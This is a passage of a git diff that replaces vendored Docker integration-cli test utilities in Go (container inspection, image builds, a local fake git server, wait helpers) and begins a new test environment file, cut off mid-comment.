inspectFilter(name, "json .Mounts") - if err != nil { - return types.MountPoint{}, err - } - - return inspectMountPointJSON(out, destination) -} - -var errMountNotFound = errors.New("mount point not found") - -func inspectMountPointJSON(j, destination string) (types.MountPoint, error) { - var mp []types.MountPoint - if err := json.Unmarshal([]byte(j), &mp); err != nil { - return types.MountPoint{}, err - } - - var m *types.MountPoint - for _, c := range mp { - if c.Destination == destination { - m = &c - break - } - } - - if m == nil { - return types.MountPoint{}, errMountNotFound - } - - return *m, nil -} - -func inspectImage(name, filter string) (string, error) { - args := []string{"inspect", "--type", "image"} - if filter != "" { - format := fmt.Sprintf("{{%s}}", filter) - args = append(args, "-f", format) - } - args = append(args, name) - inspectCmd := exec.Command(dockerBinary, args...) - out, exitCode, err := runCommandWithOutput(inspectCmd) - if err != nil || exitCode != 0 { - return "", fmt.Errorf("failed to inspect %s: %s", name, out) - } - return strings.TrimSpace(out), nil -} - -func getIDByName(name string) (string, error) { - return inspectFieldWithError(name, "Id") -} - -// getContainerState returns the exit code of the container -// and true if it's running -// the exit code should be ignored if it's running -func getContainerState(c *check.C, id string) (int, bool, error) { - var ( - exitStatus int - running bool - ) - out, exitCode := dockerCmd(c, "inspect", "--format={{.State.Running}} {{.State.ExitCode}}", id) - if exitCode != 0 { - return 0, false, fmt.Errorf("%q doesn't exist: %s", id, out) - } - - out = strings.Trim(out, "\n") - splitOutput := strings.Split(out, " ") - if len(splitOutput) != 2 { - return 0, false, fmt.Errorf("failed to get container state: output is broken") - } - if splitOutput[0] == "true" { - running = true - } - if n, err := strconv.Atoi(splitOutput[1]); err == nil { - exitStatus = n - } else { - return 0, false, fmt.Errorf("failed to get container state: couldn't parse integer") - } - - return exitStatus, running, nil -} - -func buildImageCmd(name, dockerfile string, useCache bool, buildFlags ...string) *exec.Cmd { - return buildImageCmdWithHost(name, dockerfile, "", useCache, buildFlags...) -} - -func buildImageCmdWithHost(name, dockerfile, host string, useCache bool, buildFlags ...string) *exec.Cmd { - args := []string{} - if host != "" { - args = append(args, "--host", host) - } - args = append(args, "build", "-t", name) - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, "-") - buildCmd := exec.Command(dockerBinary, args...) - buildCmd.Stdin = strings.NewReader(dockerfile) - return buildCmd -} - -func buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, error) { - buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) - out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return "", out, fmt.Errorf("failed to build the image: %s", out) - } - id, err := getIDByName(name) - if err != nil { - return "", out, err - } - return id, out, nil -} - -func buildImageWithStdoutStderr(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, string, error) { - buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) - stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) - if err != nil || exitCode != 0 { - return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) - } - id, err := getIDByName(name) - if err != nil { - return "", stdout, stderr, err - } - return id, stdout, stderr, nil -} - -func buildImage(name, dockerfile string, useCache bool, buildFlags ...string) (string, error) { - id, _, err := buildImageWithOut(name, dockerfile, useCache, buildFlags...) - return id, err -} - -func buildImageFromContext(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, error) { - id, _, err := buildImageFromContextWithOut(name, ctx, useCache, buildFlags...) - if err != nil { - return "", err - } - return id, nil -} - -func buildImageFromContextWithOut(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, ".") - buildCmd := exec.Command(dockerBinary, args...) - buildCmd.Dir = ctx.Dir - out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return "", "", fmt.Errorf("failed to build the image: %s", out) - } - id, err := getIDByName(name) - if err != nil { - return "", "", err - } - return id, out, nil -} - -func buildImageFromContextWithStdoutStderr(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, ".") - buildCmd := exec.Command(dockerBinary, args...) - buildCmd.Dir = ctx.Dir - - stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) - if err != nil || exitCode != 0 { - return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) - } - id, err := getIDByName(name) - if err != nil { - return "", stdout, stderr, err - } - return id, stdout, stderr, nil -} - -func buildImageFromGitWithStdoutStderr(name string, ctx *fakeGit, useCache bool, buildFlags ...string) (string, string, string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, ctx.RepoURL) - buildCmd := exec.Command(dockerBinary, args...) - - stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) - if err != nil || exitCode != 0 { - return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) - } - id, err := getIDByName(name) - if err != nil { - return "", stdout, stderr, err - } - return id, stdout, stderr, nil -} - -func buildImageFromPath(name, path string, useCache bool, buildFlags ...string) (string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, path) - buildCmd := exec.Command(dockerBinary, args...) - out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return "", fmt.Errorf("failed to build the image: %s", out) - } - return getIDByName(name) -} - -type gitServer interface { - URL() string - Close() error -} - -type localGitServer struct { - *httptest.Server -} - -func (r *localGitServer) Close() error { - r.Server.Close() - return nil -} - -func (r *localGitServer) URL() string { - return r.Server.URL -} - -type fakeGit struct { - root string - server gitServer - RepoURL string -} - -func (g *fakeGit) Close() { - g.server.Close() - os.RemoveAll(g.root) -} - -func newFakeGit(name string, files map[string]string, enforceLocalServer bool) (*fakeGit, error) { - ctx, err := fakeContextWithFiles(files) - if err != nil { - return nil, err - } - defer ctx.Close() - curdir, err := os.Getwd() - if err != nil { - return nil, err - } - defer os.Chdir(curdir) - - if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to init repo: %s (%s)", err, output) - } - err = os.Chdir(ctx.Dir) - if err != nil { - return nil, err - } - if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to set 'user.name': %s (%s)", err, output) - } - if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to set 'user.email': %s (%s)", err, output) - } - if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to add files to repo: %s (%s)", err, output) - } - if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to commit to repo: %s (%s)", err, output) - } - - root, err := ioutil.TempDir("", "docker-test-git-repo") - if err != nil { - return nil, err - } - repoPath := filepath.Join(root, name+".git") - if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil { - os.RemoveAll(root) - return nil, fmt.Errorf("error trying to clone --bare: %s (%s)", err, output) - } - err = os.Chdir(repoPath) - if err != nil { - os.RemoveAll(root) - return nil, err - } - if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil { - os.RemoveAll(root) - return nil, fmt.Errorf("error trying to git update-server-info: %s (%s)", err, output) - } - err = os.Chdir(curdir) - if err != nil { - os.RemoveAll(root) - return nil, err - } - - var server gitServer - if !enforceLocalServer { - // use fakeStorage server, which might be local or remote (at test daemon) - server, err = fakeStorageWithContext(fakeContextFromDir(root)) - if err != nil { - return nil, fmt.Errorf("cannot start fake storage: %v", err) - } - } else { - // always start a local http server on CLI test machine - httpServer := httptest.NewServer(http.FileServer(http.Dir(root))) - server = &localGitServer{httpServer} - } - return &fakeGit{ - root: root, - server: server, - RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name), - }, nil -} - -// Write `content` to the file at path `dst`, creating it if necessary, -// as well as any missing directories. -// The file is truncated if it already exists. -// Fail the test when error occurs. -func writeFile(dst, content string, c *check.C) { - // Create subdirectories if necessary - c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil) - f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700) - c.Assert(err, check.IsNil) - defer f.Close() - // Write content (truncate if it exists) - _, err = io.Copy(f, strings.NewReader(content)) - c.Assert(err, check.IsNil) -} - -// Return the contents of file at path `src`. -// Fail the test when error occurs. -func readFile(src string, c *check.C) (content string) { - data, err := ioutil.ReadFile(src) - c.Assert(err, check.IsNil) - - return string(data) -} - -func containerStorageFile(containerID, basename string) string { - return filepath.Join(containerStoragePath, containerID, basename) -} - -// docker commands that use this function must be run with the '-d' switch. -func runCommandAndReadContainerFile(filename string, cmd *exec.Cmd) ([]byte, error) { - out, _, err := runCommandWithOutput(cmd) - if err != nil { - return nil, fmt.Errorf("%v: %q", err, out) - } - - contID := strings.TrimSpace(out) - - if err := waitRun(contID); err != nil { - return nil, fmt.Errorf("%v: %q", contID, err) - } - - return readContainerFile(contID, filename) -} - -func readContainerFile(containerID, filename string) ([]byte, error) { - f, err := os.Open(containerStorageFile(containerID, filename)) - if err != nil { - return nil, err - } - defer f.Close() - - content, err := ioutil.ReadAll(f) - if err != nil { - return nil, err - } - - return content, nil -} - -func readContainerFileWithExec(containerID, filename string) ([]byte, error) { - out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "exec", containerID, "cat", filename)) - return []byte(out), err -} - -// daemonTime provides the current time on the daemon host -func daemonTime(c *check.C) time.Time { - if isLocalDaemon { - return time.Now() - } - - status, body, err := sockRequest("GET", "/info", nil) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - - type infoJSON struct { - SystemTime string - } - var info infoJSON - err = json.Unmarshal(body, &info) - c.Assert(err, check.IsNil, check.Commentf("unable to unmarshal GET /info response")) - - dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) - c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response")) - return dt -} - -// daemonUnixTime returns the current time on the daemon host with nanoseconds precision. -// It return the time formatted how the client sends timestamps to the server. -func daemonUnixTime(c *check.C) string { - return parseEventTime(daemonTime(c)) -} - -func parseEventTime(t time.Time) string { - return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())) -} - -func setupRegistry(c *check.C, schema1 bool, auth, tokenURL string) *testRegistryV2 { - reg, err := newTestRegistryV2(c, schema1, auth, tokenURL) - c.Assert(err, check.IsNil) - - // Wait for registry to be ready to serve requests. - for i := 0; i != 50; i++ { - if err = reg.Ping(); err == nil { - break - } - time.Sleep(100 * time.Millisecond) - } - - c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for test registry to become available: %v", err)) - return reg -} - -func setupNotary(c *check.C) *testNotary { - ts, err := newTestNotary(c) - c.Assert(err, check.IsNil) - - return ts -} - -// appendBaseEnv appends the minimum set of environment variables to exec the -// docker cli binary for testing with correct configuration to the given env -// list. -func appendBaseEnv(isTLS bool, env ...string) []string { - preserveList := []string{ - // preserve remote test host - "DOCKER_HOST", - - // windows: requires preserving SystemRoot, otherwise dial tcp fails - // with "GetAddrInfoW: A non-recoverable error occurred during a database lookup." - "SystemRoot", - - // testing help text requires the $PATH to dockerd is set - "PATH", - } - if isTLS { - preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH") - } - - for _, key := range preserveList { - if val := os.Getenv(key); val != "" { - env = append(env, fmt.Sprintf("%s=%s", key, val)) - } - } - return env -} - -func createTmpFile(c *check.C, content string) string { - f, err := ioutil.TempFile("", "testfile") - c.Assert(err, check.IsNil) - - filename := f.Name() - - err = ioutil.WriteFile(filename, []byte(content), 0644) - c.Assert(err, check.IsNil) - - return filename -} - -func buildImageWithOutInDamon(socket string, name, dockerfile string, useCache bool) (string, error) { - args := []string{"--host", socket} - buildCmd := buildImageCmdArgs(args, name, dockerfile, useCache) - out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return out, fmt.Errorf("failed to build the image: %s, error: %v", out, err) - } - return out, nil -} - -func buildImageCmdArgs(args []string, name, dockerfile string, useCache bool) *exec.Cmd { - args = append(args, []string{"-D", "build", "-t", name}...) - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, "-") - buildCmd := exec.Command(dockerBinary, args...) - buildCmd.Stdin = strings.NewReader(dockerfile) - return buildCmd - -} - -func waitForContainer(contID string, args ...string) error { - args = append([]string{dockerBinary, "run", "--name", contID}, args...) - result := icmd.RunCmd(icmd.Cmd{Command: args}) - if result.Error != nil { - return result.Error - } - return waitRun(contID) -} - -// waitRestart will wait for the specified container to restart once -func waitRestart(contID string, duration time.Duration) error { - return waitInspect(contID, "{{.RestartCount}}", "1", duration) -} - -// waitRun will wait for the specified container to be running, maximum 5 seconds. -func waitRun(contID string) error { - return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second) -} - -// waitExited will wait for the specified container to state exit, subject -// to a maximum time limit in seconds supplied by the caller -func waitExited(contID string, duration time.Duration) error { - return waitInspect(contID, "{{.State.Status}}", "exited", duration) -} - -// waitInspect will wait for the specified container to have the specified string -// in the inspect output. It will wait until the specified timeout (in seconds) -// is reached. -func waitInspect(name, expr, expected string, timeout time.Duration) error { - return waitInspectWithArgs(name, expr, expected, timeout) -} - -func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error { - after := time.After(timeout) - - args := append(arg, "inspect", "-f", expr, name) - for { - result := icmd.RunCommand(dockerBinary, args...) - if result.Error != nil { - if !strings.Contains(result.Stderr(), "No such") { - return fmt.Errorf("error executing docker inspect: %v\n%s", - result.Stderr(), result.Stdout()) - } - select { - case <-after: - return result.Error - default: - time.Sleep(10 * time.Millisecond) - continue - } - } - - out := strings.TrimSpace(result.Stdout()) - if out == expected { - break - } - - select { - case <-after: - return fmt.Errorf("condition \"%q == %q\" not true in time", out, expected) - default: - } - - time.Sleep(100 * time.Millisecond) - } - return nil -} - -func getInspectBody(c *check.C, version, id string) []byte { - endpoint := fmt.Sprintf("/%s/containers/%s/json", version, id) - status, body, err := sockRequest("GET", endpoint, nil) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - return body -} - -// Run a long running idle task in a background container using the -// system-specific default image and command. -func runSleepingContainer(c *check.C, extraArgs ...string) (string, int) { - return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...) -} - -// Run a long running idle task in a background container using the specified -// image and the system-specific command. -func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) (string, int) { - args := []string{"run", "-d"} - args = append(args, extraArgs...) - args = append(args, image) - args = append(args, sleepCommandForDaemonPlatform()...) - return dockerCmd(c, args...) -} - -func getRootUIDGID() (int, int, error) { - uidgid := strings.Split(filepath.Base(dockerBasePath), ".") - if len(uidgid) == 1 { - //user namespace remapping is not turned on; return 0 - return 0, 0, nil - } - uid, err := strconv.Atoi(uidgid[0]) - if err != nil { - return 0, 0, err - } - gid, err := strconv.Atoi(uidgid[1]) - if err != nil { - return 0, 0, err - } - return uid, gid, nil -} - -// minimalBaseImage returns the name of the minimal base image for the current -// daemon platform. -func minimalBaseImage() string { - if daemonPlatform == "windows" { - return WindowsBaseImage - } - return "scratch" -} - -func getGoroutineNumber() (int, error) { - i := struct { - NGoroutines int - }{} - status, b, err := sockRequest("GET", "/info", nil) - if err != nil { - return 0, err - } - if status != http.StatusOK { - return 0, fmt.Errorf("http status code: %d", status) - } - if err := json.Unmarshal(b, &i); err != nil { - return 0, err - } - return i.NGoroutines, nil -} - -func waitForGoroutines(expected int) error { - t := time.After(30 * time.Second) - for { - select { - case <-t: - n, err := getGoroutineNumber() - if err != nil { - return err - } - if n > expected { - return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n) - } - default: - n, err := getGoroutineNumber() - if err != nil { - return err - } - if n <= expected { - return nil - } - time.Sleep(200 * time.Millisecond) - } - } -} - -// getErrorMessage returns the error message from an error API response -func getErrorMessage(c *check.C, body []byte) string { - var resp types.ErrorResponse - c.Assert(json.Unmarshal(body, &resp), check.IsNil) - return strings.TrimSpace(resp.Message) -} - -func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) { - after := time.After(timeout) - for { - v, comment := f(c) - assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params) - select { - case <-after: - assert = true - default: - } - if assert { - if comment != nil { - args = append(args, comment) - } - c.Assert(v, checker, args...) - return - } - time.Sleep(100 * time.Millisecond) - } -} - -type checkF func(*check.C) (interface{}, check.CommentInterface) -type reducer func(...interface{}) interface{} - -func reducedCheck(r reducer, funcs ...checkF) checkF { - return func(c *check.C) (interface{}, check.CommentInterface) { - var values []interface{} - var comments []string - for _, f := range funcs { - v, comment := f(c) - values = append(values, v) - if comment != nil { - comments = append(comments, comment.CheckCommentString()) - } - } - return r(values...), check.Commentf("%v", strings.Join(comments, ", ")) - } -} - -func sumAsIntegers(vals ...interface{}) interface{} { - var s int - for _, v := range vals { - s += v.(int) - } - return s -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go b/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go new file mode 100644 index 0000000000..1c05bf5d04 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go @@ -0,0 +1,466 @@ +package main + +import ( + "context" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/internal/test/request" + "github.com/go-check/check" + "gotest.tools/icmd" +) + +// Deprecated +func daemonHost() string { + return request.DaemonHost() +} + +func deleteImages(images ...string) error { + args := []string{dockerBinary, "rmi", "-f"} + return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error +} + +// Deprecated: use cli.Docker or cli.DockerCmd +func dockerCmdWithError(args ...string) (string, int, error) { + result := cli.Docker(cli.Args(args...)) + if result.Error != nil { + return result.Combined(), result.ExitCode, result.Compare(icmd.Success) + } + return result.Combined(), result.ExitCode, result.Error +} + +// Deprecated: use cli.Docker or cli.DockerCmd +func dockerCmd(c *check.C, args ...string) (string, int) { + result := cli.DockerCmd(c, args...) + return result.Combined(), result.ExitCode +} + +// Deprecated: use cli.Docker or cli.DockerCmd +func dockerCmdWithResult(args ...string) *icmd.Result { + return cli.Docker(cli.Args(args...)) +} + +func findContainerIP(c *check.C, id string, network string) string { + out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id) + return strings.Trim(out, " \r\n'") +} + +func getContainerCount(c *check.C) int { + const containers = "Containers:" + + result := icmd.RunCommand(dockerBinary, "info") + result.Assert(c, icmd.Success) + + lines := strings.Split(result.Combined(), "\n") + for _, line := range lines { + if strings.Contains(line, containers) { + output := strings.TrimSpace(line) + output = strings.TrimLeft(output, containers) + output = strings.Trim(output, " ") + containerCount, err := strconv.Atoi(output) + c.Assert(err, checker.IsNil) + return containerCount + } + } + return 0 +} + +func inspectFieldAndUnmarshall(c *check.C, name, field string, output interface{}) { + str := inspectFieldJSON(c, name, field) + err := json.Unmarshal([]byte(str), output) + if c != nil { + c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err)) + } +} + +// Deprecated: use cli.Inspect +func inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + result := icmd.RunCommand(dockerBinary, "inspect", "-f", format, name) + if result.Error != nil || result.ExitCode != 0 { + return "", fmt.Errorf("failed to inspect %s: %s", name, result.Combined()) + } + return strings.TrimSpace(result.Combined()), nil +} + +// Deprecated: use cli.Inspect +func inspectFieldWithError(name, field string) (string, error) { + return inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +// Deprecated: use cli.Inspect +func inspectField(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf(".%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +// Deprecated: use cli.Inspect +func inspectFieldJSON(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("json .%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +// Deprecated: use cli.Inspect +func inspectFieldMap(c *check.C, name, path, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +// Deprecated: use cli.Inspect +func inspectMountSourceField(name, destination string) (string, error) { + m, err := inspectMountPoint(name, destination) + if err != nil { + return "", err + } + return m.Source, nil +} + +// Deprecated: use cli.Inspect +func inspectMountPoint(name, destination string) (types.MountPoint, error) { + out, err := inspectFilter(name, "json .Mounts") + if err != nil { + return types.MountPoint{}, err + } + + return inspectMountPointJSON(out, destination) +} + +var errMountNotFound = errors.New("mount point not found") + +// Deprecated: use cli.Inspect +func inspectMountPointJSON(j, destination string) (types.MountPoint, error) { + var mp []types.MountPoint + if err := json.Unmarshal([]byte(j), &mp); err != nil { + return types.MountPoint{}, err + } + + var m *types.MountPoint + for _, c := range mp { + if c.Destination == destination { + m = &c + break + } + } + + if m == nil { + return types.MountPoint{}, errMountNotFound + } + + return *m, nil +} + +// Deprecated: use cli.Inspect +func inspectImage(c *check.C, name, filter string) string { + args := []string{"inspect", "--type", "image"} + if filter != "" { + format := fmt.Sprintf("{{%s}}", filter) + args = append(args, "-f", format) + } + args = append(args, name) + result := icmd.RunCommand(dockerBinary, args...) + result.Assert(c, icmd.Success) + return strings.TrimSpace(result.Combined()) +} + +func getIDByName(c *check.C, name string) string { + id, err := inspectFieldWithError(name, "Id") + c.Assert(err, checker.IsNil) + return id +} + +// Deprecated: use cli.Build +func buildImageSuccessfully(c *check.C, name string, cmdOperators ...cli.CmdOperator) { + buildImage(name, cmdOperators...).Assert(c, icmd.Success) +} + +// Deprecated: use cli.Build +func buildImage(name string, cmdOperators ...cli.CmdOperator) *icmd.Result { + return cli.Docker(cli.Build(name), cmdOperators...) +} + +// Write `content` to the file at path `dst`, creating it if necessary, +// as well as any missing directories. +// The file is truncated if it already exists. +// Fail the test when error occurs. +func writeFile(dst, content string, c *check.C) { + // Create subdirectories if necessary + c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil) + f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700) + c.Assert(err, check.IsNil) + defer f.Close() + // Write content (truncate if it exists) + _, err = io.Copy(f, strings.NewReader(content)) + c.Assert(err, check.IsNil) +} + +// Return the contents of file at path `src`. +// Fail the test when error occurs. +func readFile(src string, c *check.C) (content string) { + data, err := ioutil.ReadFile(src) + c.Assert(err, check.IsNil) + + return string(data) +} + +func containerStorageFile(containerID, basename string) string { + return filepath.Join(testEnv.PlatformDefaults.ContainerStoragePath, containerID, basename) +} + +// docker commands that use this function must be run with the '-d' switch. +func runCommandAndReadContainerFile(c *check.C, filename string, command string, args ...string) []byte { + result := icmd.RunCommand(command, args...) + result.Assert(c, icmd.Success) + contID := strings.TrimSpace(result.Combined()) + if err := waitRun(contID); err != nil { + c.Fatalf("%v: %q", contID, err) + } + return readContainerFile(c, contID, filename) +} + +func readContainerFile(c *check.C, containerID, filename string) []byte { + f, err := os.Open(containerStorageFile(containerID, filename)) + c.Assert(err, checker.IsNil) + defer f.Close() + + content, err := ioutil.ReadAll(f) + c.Assert(err, checker.IsNil) + return content +} + +func readContainerFileWithExec(c *check.C, containerID, filename string) []byte { + result := icmd.RunCommand(dockerBinary, "exec", containerID, "cat", filename) + result.Assert(c, icmd.Success) + return []byte(result.Combined()) +} + +// daemonTime provides the current time on the daemon host +func daemonTime(c *check.C) time.Time { + if testEnv.IsLocalDaemon() { + return time.Now() + } + cli, err := client.NewEnvClient() + c.Assert(err, check.IsNil) + defer cli.Close() + + info, err := cli.Info(context.Background()) + c.Assert(err, check.IsNil) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response")) + return dt +} + +// daemonUnixTime returns the current time on the daemon host with nanoseconds precision. +// It return the time formatted how the client sends timestamps to the server. +func daemonUnixTime(c *check.C) string { + return parseEventTime(daemonTime(c)) +} + +func parseEventTime(t time.Time) string { + return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())) +} + +// appendBaseEnv appends the minimum set of environment variables to exec the +// docker cli binary for testing with correct configuration to the given env +// list. +func appendBaseEnv(isTLS bool, env ...string) []string { + preserveList := []string{ + // preserve remote test host + "DOCKER_HOST", + + // windows: requires preserving SystemRoot, otherwise dial tcp fails + // with "GetAddrInfoW: A non-recoverable error occurred during a database lookup." + "SystemRoot", + + // testing help text requires the $PATH to dockerd is set + "PATH", + } + if isTLS { + preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH") + } + + for _, key := range preserveList { + if val := os.Getenv(key); val != "" { + env = append(env, fmt.Sprintf("%s=%s", key, val)) + } + } + return env +} + +func createTmpFile(c *check.C, content string) string { + f, err := ioutil.TempFile("", "testfile") + c.Assert(err, check.IsNil) + + filename := f.Name() + + err = ioutil.WriteFile(filename, []byte(content), 0644) + c.Assert(err, check.IsNil) + + return filename +} + +// waitRun will wait for the specified container to be running, maximum 5 seconds. +// Deprecated: use cli.WaitFor +func waitRun(contID string) error { + return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second) +} + +// waitInspect will wait for the specified container to have the specified string +// in the inspect output. It will wait until the specified timeout (in seconds) +// is reached. +// Deprecated: use cli.WaitFor +func waitInspect(name, expr, expected string, timeout time.Duration) error { + return waitInspectWithArgs(name, expr, expected, timeout) +} + +// Deprecated: use cli.WaitFor +func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error { + return daemon.WaitInspectWithArgs(dockerBinary, name, expr, expected, timeout, arg...) +} + +func getInspectBody(c *check.C, version, id string) []byte { + cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion(version)) + c.Assert(err, check.IsNil) + defer cli.Close() + _, body, err := cli.ContainerInspectWithRaw(context.Background(), id, false) + c.Assert(err, check.IsNil) + return body +} + +// Run a long running idle task in a background container using the +// system-specific default image and command. +func runSleepingContainer(c *check.C, extraArgs ...string) string { + return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...) +} + +// Run a long running idle task in a background container using the specified +// image and the system-specific command. +func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) string { + args := []string{"run", "-d"} + args = append(args, extraArgs...) + args = append(args, image) + args = append(args, sleepCommandForDaemonPlatform()...) + return strings.TrimSpace(cli.DockerCmd(c, args...).Combined()) +} + +// minimalBaseImage returns the name of the minimal base image for the current +// daemon platform. +func minimalBaseImage() string { + return testEnv.PlatformDefaults.BaseImage +} + +func getGoroutineNumber() (int, error) { + cli, err := client.NewEnvClient() + if err != nil { + return 0, err + } + defer cli.Close() + + info, err := cli.Info(context.Background()) + if err != nil { + return 0, err + } + return info.NGoroutines, nil +} + +func waitForGoroutines(expected int) error { + t := time.After(30 * time.Second) + for { + select { + case <-t: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n > expected { + return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n) + } + default: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n <= expected { + return nil + } + time.Sleep(200 * time.Millisecond) + } + } +} + +// getErrorMessage returns the error message from an error API response +func getErrorMessage(c *check.C, body []byte) string { + var resp types.ErrorResponse + c.Assert(json.Unmarshal(body, &resp), check.IsNil) + return strings.TrimSpace(resp.Message) +} + +func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) { + after := time.After(timeout) + for { + v, comment := f(c) + assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params) + select { + case <-after: + assert = true + default: + } + if assert { + if comment != nil { + args = append(args, comment) + } + c.Assert(v, checker, args...) + return + } + time.Sleep(100 * time.Millisecond) + } +} + +type checkF func(*check.C) (interface{}, check.CommentInterface) +type reducer func(...interface{}) interface{} + +func reducedCheck(r reducer, funcs ...checkF) checkF { + return func(c *check.C) (interface{}, check.CommentInterface) { + var values []interface{} + var comments []string + for _, f := range funcs { + v, comment := f(c) + values = append(values, v) + if comment != nil { + comments = append(comments, comment.CheckCommentString()) + } + } + return r(values...), check.Commentf("%v", strings.Join(comments, ", ")) + } +} + +func sumAsIntegers(vals ...interface{}) interface{} { + var s int + for _, v := range vals { + s += v.(int) + } + return s +} diff --git a/vendor/github.com/docker/docker/integration-cli/environment/environment.go b/vendor/github.com/docker/docker/integration-cli/environment/environment.go new file mode 100644 index 0000000000..82cf99652b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/environment/environment.go @@ -0,0 +1,49 @@ +package environment // import "github.com/docker/docker/integration-cli/environment" + +import ( + "os" + "os/exec" + + "github.com/docker/docker/internal/test/environment" +) + +var ( + // DefaultClientBinary is the name of the docker binary + DefaultClientBinary = os.Getenv("TEST_CLIENT_BINARY") +) + +func init() { + if DefaultClientBinary == "" { + DefaultClientBinary = "docker" + } +} + +// Execution contains information about the current test execution and daemon +// under test +type Execution struct { + environment.Execution + dockerBinary string +} + +// DockerBinary returns the docker binary for this testing environment +func (e *Execution) DockerBinary() string { + return e.dockerBinary +} + +// New returns details about the testing 